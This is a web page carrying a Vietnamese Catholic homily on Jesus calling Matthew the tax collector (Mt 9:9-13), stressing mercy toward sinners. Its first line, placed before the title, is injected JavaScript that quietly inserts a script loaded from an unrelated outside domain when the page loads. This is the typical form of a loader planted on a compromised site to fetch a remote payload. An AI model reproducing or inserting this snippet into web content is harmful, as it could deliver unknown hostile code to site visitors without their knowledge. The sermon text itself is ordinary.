;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ƠN GỌI THÁNH MATTHEW – Xitô PS

ƠN GỌI THÁNH MATTHEW

SUY NIỆM THỨ 2 TUẦN XXV 

MT 9, 9-13

Với bài Tin Mừng hôm nay chúng ta vừa nghe ghi lại việc Đức Giêsu kêu gọi ông Matthêu làm Tông đồ  trong lúc ông đang hành nghề thu thuế, một ngành nghề đối với xã hội Do Thái lúc bấy giờ đều khinh bỉ và gán ghép là phường tội lỗi. Matthêu được Marcô (2, 14) và Lc (5, 27) gọi bằng tên Do Thái là Lêvi, và Marcô còn ghi thêm một chi tiết “Lê vi là con ông An-phê”. Vì Matthêu hành nghề thu thuế như vậy, mà được Đức Giêsu gọi làm Tông Đồ là một biến cố nghịch thường. Thái độ đáp ứng của ông cũng nghịch thường không kém.

Vâng, từ một người thu thuế, Matthêu đã trở thành vị Tông Đồ của Đức Giêsu như Tin Mừng tường thuật: “Đức Giêsu đi ngang qua trạm thu thuế, thì thấy một người tên là Matthêu đang ngồi ở đó. Người bảo ông: Anh hãy theo tôi”. Ông đứng dậy đi theo Người”. Một lời mời gọi, một sự đáp trả thật dứt khoát và mau mắn với tất cả tin tưởng phó thác và hân hoan.

Quả thế, để bày tỏ niềm vui trong ơn gọi mới quá to lớn và bất ngờ, một cuộc đổi đời đầy ý nghĩa tràn trề hạnh phúc khôn xiết kể! ông đã tổ chức một bữa tiệc để thết đãi Đức Giêsu và các môn đệ Chúa, dĩ nhiên ông cũng mời các bạn đồng nghiệp và nhiều bạn bè khác, cả những khách không được mời cũng có mặt, nói thế chắc hẳn không lầm, vì Tin Mừng có nói: “Mấy ông Pharisiêu thấy nhiều thu thuế và người tội lỗi kéo đến cùng ăn với Người và các môn đệ, nên họ nói với các môn đệ Người rằng: “Sao Thầy các anh lại ăn uống với bọn thu thuế và quân tội lỗi như vậy? Nghe thấy thế Đức Giêsu nói: “Người khoẻ mạnh không cần thầy thuốc, người đau yếu mới cần” (xMt 9, 11).

Chúng ta phải chiêm niệm điều mà câu nói đó mặc khải cho chúng ta ngôi vị, tấm lòng và sứ vụ của Đức Giêsu, không những các người tội lỗi không làm Đức Giêsu chán nản mà; Người còn cảm thấy những nỗi thống khổ của chúng ta lôi kéo Người đến gần cũng như người thầy thuốc đến gần bệnh nhân. Trong Kinh Thánh, từ ngữ “Thầy Thuốc” này thường được áp dụng cho Thiên Chúa, chỉ Thiên Chúa mới có thể cứu chữa dân người, băng bó vết thương và đem lại cho dân sức khoẻ (Hs 6, 1; Is 30, 26; Xh 15, 26).

Bởi thế, người Môn đệ, người Tín hữu của Đức Giêsu, chúng ta hết thảy đều tự biết mình là tội nhân phải luôn luôn đến cùng Người là Thầy Thuốc để được chữa lành.

“Hãy về học cho biết ý nghĩa của câu này: Ta muốn lòng nhân chứ đâu cần lễ tế”.

Đức Giêsu khẳng định sự ưu tiên của tình yêu trên phụng tự, và của lòng nhân hậu trên lễ tế. Khi nói như thế, Người tự đồng hoá với Thiên Chúa là “chữa lành và tha thứ”: “Vì tôi không đến để kêu gọi người công chính mà để kêu gọi người tội lỗi”.

Quả thực, Đức Giêsu đã kêu gọi ông Matthêu, một người mà dân Do Thái coi là bất xứng, vì ở trong hàng ngũ những người tội lỗi. Điều này chứng tỏ Ngài đã không hề phân biệt đối xử, không thành kiến giai cấp. Thứ đến, Đức Giêsu đã dùng bữa với nhiều người thu thuế và tội lỗi, Điều này chứng tỏ rằng Ngài hoà mình với mọi người, gạt bỏ mọi ngăn cánh để có thể tiếp xúc với bất cứ người nào.

Hơn nữa, Đức Giêsu không bao giờ thất vọng vì một người tội lỗi. Ngài tiếp tục hy vọng rằng con người dù tồi tệ nhất cũng có thể thay đổi đời sống. Vậy bản thân chúng ta phải tin rằng Thiên Chúa nhìn chúng ta với tình yêu thương đợi chờ cho dù chúng ta chán nản thất vọng, vì chính sự ghê tởm tội lỗi của mình xâm chiếm tâm hồn chúng ta- Vì chính Ngài tự ví mình là thầy thuốc đối với bệnh nhân và là Đấng cứu độ mọi người dương thế: “Tôi không đến để kêu gọi người công chính, mà để kêu gọi người tội lỗi”. Amen.

 

LM Phêrô Khoa-Lê Trọng Ngọc

You May Also Like

Trả lời

X